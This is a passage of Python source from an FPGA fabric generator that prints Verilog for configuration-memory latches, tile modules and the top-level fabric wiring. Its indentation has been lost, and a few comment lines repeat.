# print('DEBUG: ',module, used_bits,' : ',k, used_bits[k],'AllConfigBitsCounter',AllConfigBitsCounter, str(AllConfigBitsOrder[AllConfigBitsCounter]))
if used_bits[k] == '1':
print('\tLHQD1 Inst_'+MappingFile[int(frame)][int(frame_name)]+'_bit'+str(FrameBitsPerRow-1-k)+'(', file=file)
# The next one is a little tricky:
# k iterates over the bit_mask left to right from k=0..(FrameBitsPerRow-1) (k=0 is the most left (=first) character
# But that character represents the MSB inside the frame, which iterates FrameBitsPerRow-1..0
# bit_mask[0], bit_mask[1], bit_mask[2], ...
# FrameData[FrameBitsPerRow-1-0], FrameData[FrameBitsPerRow-1-1], FrameData[FrameBitsPerRow-1-2],
print('\t.D(FrameData['+str(FrameBitsPerRow-1-k)+']),', file=file)
print('\t.E(FrameStrobe['+str(frame)+']),', file=file)
print('\t.Q(ConfigBits['+str(AllConfigBitsOrder[AllConfigBitsCounter])+'])', file=file)
print('\t);\n', file=file)
AllConfigBitsCounter += 1
print('endmodule', file=file)
return
def GenerateTileVerilog( tile_description, module, file ):
MatrixInputs = []
MatrixOutputs = []
TileInputs = []
TileOutputs = []
BEL_Inputs = []
BEL_Outputs = []
AllJumpWireList = []
NuberOfSwitchMatricesWithConfigPort = 0
# We first check if we need a configuration port
# Currently we assume that each primitive needs a configuration port
# However, a switch matrix can have no switch matrix multiplexers
# (e.g., when only bouncing back in border termination tiles)
# we can detect this as each switch matrix file contains a comment // NumberOfConfigBits
# NumberOfConfigBits:0 tells us that the switch matrix does not have a config port
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
TileTypeMarker = False
for line in tile_description:
if line[0] == 'TILE':
TileType = line[TileType_position]
TileTypeMarker = True
if TileTypeMarker == False:
raise ValueError('Could not find tile type in function GenerateTileVHDL')
# the VHDL initial header generation is shared until the Port
# in order to use GenerateVHDL_Header, we have to count the number of configuration bits by scanning all files for the "Generic ( NoConfigBits...
GlobalConfigBitsCounter = 0
if ConfigBitMode == 'frame_based':
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# GenerateVerilog_Header(file, module, NoConfigBits=str(GlobalConfigBitsCounter))
module_header_ports_list = GetTileComponentPort_Verilog(tile_description, 'NORTH')
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'EAST'))
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'SOUTH'))
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'WEST'))
module_header_ports = ', '.join(module_header_ports_list)
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
SharedExternalPorts = []
if ExternalPorts != []:
for item in ExternalPorts:
if re.search('SHARED_PORT', item):
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
bel_port = re.split(' | ',re.sub('.*BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
module_header_ports += ', '+bel_port[0]
elif bel_port[2] == 'out':
module_header_ports += ', '+bel_port[0]
SharedExternalPorts.append(shared_port)
else:
bel_port = re.split(' | ',re.sub('BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
module_header_ports += ', '+bel_port[0]
elif bel_port[2] == 'out':
module_header_ports += ', '+bel_port[0]
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
#module_header_ports += ', FrameData, FrameStrobe'
module_header_ports += ', FrameData, FrameData_O, FrameStrobe, FrameStrobe_O'
else :
module_header_ports += ', FrameData, FrameData_O, FrameStrobe, FrameStrobe_O'
else:
if ConfigBitMode == 'FlipFlopChain':
module_header_ports += ', MODE, CONFin, CONFout, CLK'
elif ConfigBitMode == 'frame_based':
module_header_ports += ', ConfigBits'
# insert CLB, I/O (or whatever BEL) component declaration
# specified in the fabric csv file after the 'BEL' key word
BEL_VHDL_riles_processed = [] # we use this list to check if we have seen a BEL description before so we only insert one component declaration
module_header_files = []
for line in tile_description:
if line[0] == 'BEL':
Inputs = []
Outputs = []
if line[VHDL_file_position] not in BEL_VHDL_riles_processed:
module_header_files.append(line[VHDL_file_position].replace('vhdl','v'))
BEL_VHDL_riles_processed.append(line[VHDL_file_position])
# we need the BEL ports (a little later) so we take them on the way
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
Inputs, Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
BEL_Inputs = BEL_Inputs + Inputs
BEL_Outputs = BEL_Outputs + Outputs
# insert switch matrix component declaration
# specified in the fabric csv file after the 'MATRIX' key word
MatrixMarker = False
for line in tile_description:
if line[0] == 'MATRIX':
if MatrixMarker == True:
raise ValueError('More than one switch matrix defined for tile '+TileType+'; exeting GenerateTileVHDL')
NuberOfSwitchMatricesWithConfigPort = NuberOfSwitchMatricesWithConfigPort + GetVerilogDeclarationForFile(line[VHDL_file_position])
module_header_files.append(line[VHDL_file_position].replace('vhdl','v'))
# we need the switch matrix ports (a little later)
MatrixInputs, MatrixOutputs = GetComponentPortsFromFile(line[VHDL_file_position])
MatrixMarker = True
if MatrixMarker == False:
raise ValueError('Could not find switch matrix definition for tyle type '+TileType+' in function GenerateTileVHDL')
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
module_header_files.append(module+'_ConfigMem.v')
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow), module_header_files=module_header_files)
PrintTileComponentPort_Verilog (tile_description, 'NORTH', file)
PrintTileComponentPort_Verilog (tile_description, 'EAST', file)
PrintTileComponentPort_Verilog (tile_description, 'SOUTH', file)
PrintTileComponentPort_Verilog (tile_description, 'WEST', file)
# now we have to scan all BELs if they use external pins, because they have to be exported to the tile module
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
# if we found BELs with top-level IO ports, we just pass them through
SharedExternalPorts = []
if ExternalPorts != []:
print('\t// Tile IO ports from BELs', file=file)
for item in ExternalPorts:
# if a part is flagged with the 'SHARED_PORT' comment, we declare that port only ones
# we use the string 'BEL_prefix_string_marker' to separate the port name from the prefix
if re.search('SHARED_PORT', item):
# we firstly get the plain port name without comments, whitespaces, etc.
# we place that in the SharedExternalPorts list to check if that port was declared earlier
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
bel_port = re.split(' | ',re.sub('.*BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
print('\tinput '+bel_port[0]+';', file=file)
elif bel_port[2] == 'out':
print('\toutput '+bel_port[0]+';', file=file)
SharedExternalPorts.append(shared_port)
else:
bel_port = re.split(' | ',re.sub('BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
print('\tinput '+bel_port[0]+';', file=file)
elif bel_port[2] == 'out':
print('\toutput '+bel_port[0]+';', file=file)
# the rest is a shared text block
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
#print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
#print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [FrameBitsPerRow-1:0] FrameData_O;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [MaxFramesPerCol-1:0] FrameStrobe_O;', file=file)
else :
print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [FrameBitsPerRow-1:0] FrameData_O;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [MaxFramesPerCol-1:0] FrameStrobe_O;', file=file)
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
else:
GenerateVerilog_PortsFooter(file, module)
# VHDL signal declarations
print('//signal declarations', file=file)
# BEL port wires
print('//BEL ports (e.g., slices)', file=file)
for port in (BEL_Inputs + BEL_Outputs):
print('\twire '+port+';', file=file)
# Jump wires
print('//jump wires', file=file)
for line in tile_description:
if line[0] == 'JUMP':
if (line[source_name] == '') or (line[destination_name] == ''):
raise ValueError('Either source or destination port for JUMP wire missing in function GenerateTileVHDL')
# we don't add ports or a corresponding signal name, if we have a NULL driver (which we use as an exception for GND and VCC (VCC0 GND0)
if not re.search('NULL', line[source_name], flags=re.IGNORECASE):
print('\twire ['+str(line[wires])+'-1:0] '+line[source_name]+';', file=file)
# we need the jump wires for the switch matrix component instantiation..
for k in range(int(line[wires])):
AllJumpWireList.append(str(line[source_name]+'('+str(k)+')'))
# internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)
print('//internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)', file=file)
# the signal has to be number of BELs+2 bits wide (Bel_counter+1 downto 0)
BEL_counter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_counter += 1
# we chain switch matrices only to the configuration port, if they really contain configuration bits
# i.e. switch matrices have a config port which is indicated by "NumberOfConfigBits:0 is false"
# The following conditional as intended to only generate the config_data signal if really anything is actually configured
# however, we leave it and just use this signal as conf_data(0 downto 0) for simply touting through CONFin to CONFout
# maybe even useful if we want to add a buffer here
# if (Bel_Counter + NuberOfSwitchMatricesWithConfigPort) > 0
#print('\twire ['+str(BEL_counter+NuberOfSwitchMatricesWithConfigPort)+':0] conf_data;', file=file)
if GlobalConfigBitsCounter > 0:
print('\twire [NoConfigBits-1:0] ConfigBits;', file=file)
# Cascading of routing for wires spanning more than one tile
print('\n// Cascading of routing for wires spanning more than one tile', file=file)
print('\tassign FrameData_O = FrameData;', file=file)
print('\tassign FrameStrobe_O = FrameStrobe;', file=file)
for line in tile_description:
if line[0] in ['NORTH','EAST','SOUTH','WEST']:
span=abs(int(line[X_offset]))+abs(int(line[Y_offset]))
# in case a signal spans 2 ore more tiles in any direction
if (span >= 2) and (line[source_name]!='NULL') and (line[destination_name]!='NULL'):
high_bound_index = (span*int(line[wires]))-1
print('\tassign '+line[source_name]+'['+str(high_bound_index)+'-'+str(line[wires])+':0]',end='', file=file)
print(' = '+line[destination_name]+'['+str(high_bound_index)+':'+str(line[wires])+'];', file=file)
# top configuration data daisy chaining
if ConfigBitMode == 'FlipFlopChain':
print('// top configuration data daisy chaining', file=file)
print('\tassign conf_data[$low(conf_data)] = CONFin; // conf_data\'low=0 and CONFin is from tile module', file=file)
print('\tassign CONFout = conf_data[$high(conf_data)]; // CONFout is from tile module', file=file)
# the <module>_ConfigMem module is only parametrized through generics, so we hard code its instantiation here
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
print('\n// configuration storage latches', file=file)
print('\t'+module+'_ConfigMem Inst_'+module+'_ConfigMem (', file=file)
print('\t.FrameData(FrameData),', file=file)
print('\t.FrameStrobe(FrameStrobe),', file=file)
print('\t.ConfigBits(ConfigBits)', file=file)
print('\t);', file=file)
# BEL component instantiations
print('\n//BEL component instantiations', file=file)
All_BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
All_BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_All_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_All_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
BEL_counter = 0
BEL_ConfigBitsCounter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
ExternalPorts = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
# the BEL I/Os that go to the switch matrix
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
left_BEL_Inputs, left_BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
# the BEL I/Os that go to the tile top module
# ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix=BEL_prefix_string)
ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external')
# we remember All_BEL_Inputs and All_BEL_Outputs as wee need these pins for the switch matrix
All_BEL_Inputs = All_BEL_Inputs + BEL_Inputs
All_BEL_Outputs = All_BEL_Outputs + BEL_Outputs
left_All_BEL_Inputs = left_All_BEL_Inputs + left_BEL_Inputs
left_All_BEL_Outputs = left_All_BEL_Outputs + left_BEL_Outputs
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('\t'+EntityName+' Inst_'+BEL_prefix_string+EntityName+' (', file=file)
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t.'+(left_BEL_Inputs+left_BEL_Outputs)[k]+'('+(BEL_Inputs+BEL_Outputs)[k]+'),', file=file)
# top level I/Os (if any) just get connected directly
if ExternalPorts != []:
print('\t//I/O primitive pins go to tile top level module (not further parsed) ', file=file)
for item in ExternalPorts:
# print('DEBUG ExternalPort :',item)
port = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
port=(replace(port, substitutions))
if re.search('SHARED_PORT', item):
print('\t.'+port+'('+port+'),', file=file)
else: # if not SHARED_PORT then add BEL_prefix_string to signal name
print('\t.'+port+'('+BEL_prefix_string+port+'),', file=file)
# global configuration port
if ConfigBitMode == 'FlipFlopChain':
GenerateVerilog_Conf_Instantiation(file=file, counter=BEL_counter, close=True)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
if int(BEL_ConfigBits) == 0:
#print('\t.ConfigBits(0)', file=file)
last_pos = file.tell()
for k in range(20):
file.seek(last_pos -k) # scan character by character backwards and look for ','
my_char = file.read(1)
if my_char == ',':
file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
print(' ', end='', file=file)
break # stop scan
file.seek(0, os.SEEK_END) # go back to usual...
print('\t);\n', file=file)
else:
print('\t.ConfigBits(ConfigBits['+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+'-1:'+str(BEL_ConfigBitsCounter)+'])', file=file)
print('\t);\n', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
# for the next BEL (if any) for cascading configuration chain (this information is also needed for chaining the switch matrix)
BEL_counter += 1
# switch matrix component instantiation
# important to know:
# Each switch matrix module is build up is a specific order:
# 1.a) interconnect wire INPUTS (in the order defined by the fabric file,)
# 2.a) BEL primitive INPUTS (in the order the BEL-VHDLs are listed in the fabric CSV)
# within each BEL, the order from the module is maintained
# Note that INPUTS refers to the view of the switch matrix! Which corresponds to BEL outputs at the actual BEL
# 3.a) JUMP wire INPUTS (in the order defined by the fabric file)
# 1.b) interconnect wire OUTPUTS
# 2.b) BEL primitive OUTPUTS
# Again: OUTPUTS refers to the view of the switch matrix which corresponds to BEL inputs at the actual BEL
# 3.b) JUMP wire OUTPUTS
# The switch matrix uses single bit ports (std_logic and not std_logic_vector)!!!
print('\n//switch matrix component instantiation', file=file)
for line in tile_description:
if line[0] == 'MATRIX':
BEL_Inputs = []
BEL_Outputs = []
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('\t'+EntityName+' Inst_'+EntityName+' (', file=file)
# for port in BEL_Inputs + BEL_Outputs:
# print('\t\t',port,' => ',port,',', file=file)
Inputs = []
Outputs = []
TopInputs = []
TopOutputs = []
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrixIndexed')
# changed to: AutoSwitchMatrixIndexed
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrixIndexed')
# TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='TopIndexed')
# changed to: AutoTopIndexed
TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='AutoTopIndexed')
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t.'+(BEL_Inputs+BEL_Outputs)[k]+'(',end='', file=file)
# note that the BEL outputs (e.g., from the slice component) are the switch matrix inputs
print((Inputs+All_BEL_Outputs+AllJumpWireList+TopOutputs+All_BEL_Inputs+AllJumpWireList)[k].replace('(','[').replace(')',']')+')', end='', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
print(',', file=file)
else:
# stupid VHDL does not allow us to have a ',' for the last port connection, so we need the following for NuberOfSwitchMatricesWithConfigPort==0
if k < ((len(BEL_Inputs+BEL_Outputs)) - 1):
print(',', file=file)
else:
print('', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
if ConfigBitMode == 'FlipFlopChain':
GenerateVerilog_Conf_Instantiation(file=file, counter=BEL_counter, close=False)
# print('\t // GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
# print('\t\t MODE => Mode, ', file=file)
# print('\t\t CONFin => conf_data('+str(BEL_counter)+'), ', file=file)
# print('\t\t CONFout => conf_data('+str(BEL_counter+1)+'), ', file=file)
# print('\t\t CLK => CLK ', file=file)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
# print('DEBUG:',BEL_ConfigBits)
print('\t.ConfigBits(ConfigBits['+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+'-1:'+str(BEL_ConfigBitsCounter)+'])', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
print('\t);', file=file)
print('\n'+'endmodule', file=file)
return
def GenerateFabricVerilog( FabricFile, file, module = 'eFPGA' ):
# There are of course many possibilities for generating the fabric.
# I decided to generate a flat description as it may allow for a little easier debugging.
# For larger fabrics, this may be an issue, but not for now.
# We only have wires between two adjacent tiles in North, East, South, West direction.
# So we use the output ports to generate wires.
fabric = GetFabric(FabricFile)
y_tiles=len(fabric) # get the number of tiles in vertical direction
x_tiles=len(fabric[0]) # get the number of tiles in horizontal direction
TileTypes = GetCellTypes(fabric)
print('### Found the following tile types:\n',TileTypes)
# VHDL header
# module hard-coded TODO
module_header_ports_list = []
module_header_files = []
TileTypeOutputPorts = []
for tile in TileTypes:
#PrintComponentDeclarationForFile(str(tile)+'_tile.vhdl', file)
module_header_files.append(str(tile)+'_tile.v')
# we need the BEL ports (a little later)
Inputs, Outputs = GetComponentPortsFromFile(str(tile)+'_tile.vhdl')
TileTypeOutputPorts.append(Outputs)
# we first scan all tiles if those have IOs that have to go to top
# the order of this scan is later maintained when instantiating the actual tiles
print('\t//External IO ports exported directly from the corresponding tiles', file=file)
ExternalPorts = []
SharedExternalPorts = []
port_list = []
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':' separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
PortDefinition = PortDefinition.replace('-- ','//').replace('STD_LOGIC;','').replace('\t','')
if re.search('SHARED_PORT', item):
# for the module, we define only the very first for all SHARED_PORTs of any name category
if PortName not in SharedExternalPorts:
module_header_ports_list.append(PortName)
if 'in' in PortDefinition:
PortDefinition = PortDefinition.replace('in','')
port_list.append('\tinput '+PortName+';'+PortDefinition)
elif 'out' in PortDefinition:
PortDefinition = PortDefinition.replace('out','')
port_list.append('\toutput '+PortName+';'+PortDefinition)
SharedExternalPorts.append(PortName)
# we remember the used port name for the component instantiations to come
# for the instantiations, we have to keep track about all external ports
ExternalPorts.append(PortName)
else:
module_header_ports_list.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
if 'in' in PortDefinition:
PortDefinition = PortDefinition.replace('in','')
port_list.append('\tinput '+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+';'+PortDefinition)
elif 'out' in PortDefinition:
PortDefinition = PortDefinition.replace('out','')
port_list.append('\toutput '+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+';'+PortDefinition)
# we remember the used port name for the component instantiations to come
# we are maintaining the here used Tile_XxYy prefix as a sanity check
# ExternalPorts = ExternalPorts + 'Tile_X'+str(x)+'Y'+str(y)+'_'+str(PortName)
ExternalPorts.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
module_header_ports = ', '.join(module_header_ports_list)
if ConfigBitMode == 'frame_based':
module_header_ports += ', FrameData, FrameStrobe'
GenerateVerilog_Header(module_header_ports, file, module, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow),module_header_files = module_header_files)
for line_print in port_list:
print(line_print, file=file)
print('\tinput [(FrameBitsPerRow*'+str(y_tiles)+')-1:0] FrameData; // CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\tinput [(MaxFramesPerCol*'+str(x_tiles)+')-1:0] FrameStrobe; // CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
else:
GenerateVerilog_Header(module_header_ports, file, module, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow),module_header_files = module_header_files)
for line_print in port_list:
print(line_print, file=file)
GenerateVerilog_PortsFooter(file, module)
# VHDL signal declarations
print('//signal declarations', file=file)
print('//configuration signal declarations\n', file=file)
tile_counter_FFC = 0
if ConfigBitMode == 'FlipFlopChain':
for y in range(y_tiles):
for x in range(x_tiles):
# for the moment, we assume that all non "NULL" tiles are reconfigurable
# (i.e. are connected to the configuration shift register)
if (fabric[y][x]) != 'NULL':
tile_counter_FFC += 1
print('\twire ['+str(tile_counter_FFC)+':0] conf_data;', file=file)
if ConfigBitMode == 'frame_based':
# for y in range(y_tiles):
# for x in range(x_tiles):
# if (fabric[y][x]) != 'NULL':
# TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
# if TileConfigBits != 'NULL' and int(TileConfigBits) != 0:
# print('signal Tile_X'+str(x)+'Y'+str(y)+'_ConfigBits \t:\t std_logic_vector('+TileConfigBits+' -1 downto '+str(0)+' );', file=file)
# FrameData => Tile_Y3_FrameData,
# FrameStrobe => Tile_X1_FrameStrobe
# MaxFramesPerCol : integer := 20;
# FrameBitsPerRow : integer := 32;
for y in range(y_tiles):
print('\twire [FrameBitsPerRow-1:0] Tile_Y'+str(y)+'_FrameData;', file=file)
for x in range(x_tiles):
print('\twire [MaxFramesPerCol-1:0] Tile_X'+str(x)+'_FrameStrobe;', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
print('\twire [FrameBitsPerRow-1:0] Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O;', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
print('\twire [MaxFramesPerCol-1:0] Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O;', file=file)
print('\n//tile-to-tile signal declarations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# line contains something like "E2BEG : std_logic_vector( 7 downto 0 )" so I use split on '('
SignalName, Vector = re.split('\(',line)
# print('DEBUG line: ', line, file=file)
# print('DEBUG SignalName: ', SignalName, file=file)
# print('DEBUG Vector: ', Vector, file=file)
# Vector = re.sub('//.*', '', Vector)
print('\twire ['+Vector.replace(' downto ',':').replace(' )',']').replace(' ','').replace('\t','')+' Tile_X'+str(x)+'Y'+str(y)+'_'+SignalName+';', file=file)
# top configuration data daisy chaining
# this is copy and paste from tile code generation (so we can modify this here without side effects
if ConfigBitMode == 'FlipFlopChain':
print('// top configuration data daisy chaining', file=file)
print('\tassign conf_data[0] = CONFin; // conf_data\'low=0 and CONFin is from tile module', file=file)
print('CONFout = conf_data['+str(tile_counter_FFC)+']; // CONFout is from tile module', file=file)
elif ConfigBitMode == 'frame_based':
print('', file=file)
for y in range(y_tiles):
print('\tassign Tile_Y'+str(y)+'_FrameData = FrameData[(FrameBitsPerRow*('+str(y)+'+1))-1:FrameBitsPerRow*'+str(y)+'];', file=file)
for x in range(x_tiles):
print('\tassign Tile_X'+str(x)+'_FrameStrobe = FrameStrobe[(MaxFramesPerCol*('+str(x)+'+1))-1:MaxFramesPerCol*'+str(x)+'];', file=file)
# VHDL tile instantiations
tile_counter = 0
ExternalPorts_counter = 0
print('\n//tile instantiations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
EntityName = GetComponentEntityNameFromFile(str(fabric[y][x])+'_tile.vhdl')
print('\t'+EntityName+' Tile_X'+str(x)+'Y'+str(y)+'_'+EntityName+' (', file=file)
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# print('DEBUG TileInputs: ', TileInputs)
# print('DEBUG TileOutputs: ', TileOutputs)
TilePorts = []
TilePortsDebug = []
# for connecting the instance, we write the tile ports in the order all inputs and all outputs
for port in TileInputs + TileOutputs:
# GetComponentPortsFromFile returns vector information that starts with "(..." and we throw that away
# However the vector information is still interesting for debug purpose
TilePorts.append(re.sub(' ','',(re.sub('\(.*', '', port, flags=re.IGNORECASE))))
TilePortsDebug.append(port)
# now we get the connecting input signals in the order NORTH EAST SOUTH WEST (order is given in fabric.csv)
# from the adjacent tiles. For example, a NorthEnd-port is connected to a SouthBeg-port on tile Y+1
# note that fabric[y][x] has its origin [0][0] in the top left corner
TileInputSignal = []
TileInputSignalCountPerDirection = []
# IMPORTANT: we have to go through the following in NORTH EAST SOUTH WEST order
# NORTH direction: get the NiBEG wires from tile y+1, because they drive NiEND
if y < (y_tiles-1):
if (fabric[y+1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y+1][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y+1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# EAST direction: get the EiBEG wires from tile x-1, because they drive EiEND
if x > 0:
if (fabric[y][x-1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x-1])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x-1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# SOUTH direction: get the SiBEG wires from tile y-1, because they drive SiEND
if y > 0:
if (fabric[y-1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y-1][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y-1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# WEST direction: get the WiBEG wires from tile x+1, because they drive WiEND
if x < (x_tiles-1):
if (fabric[y][x+1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x+1])+'_tile.vhdl', filter='WEST')
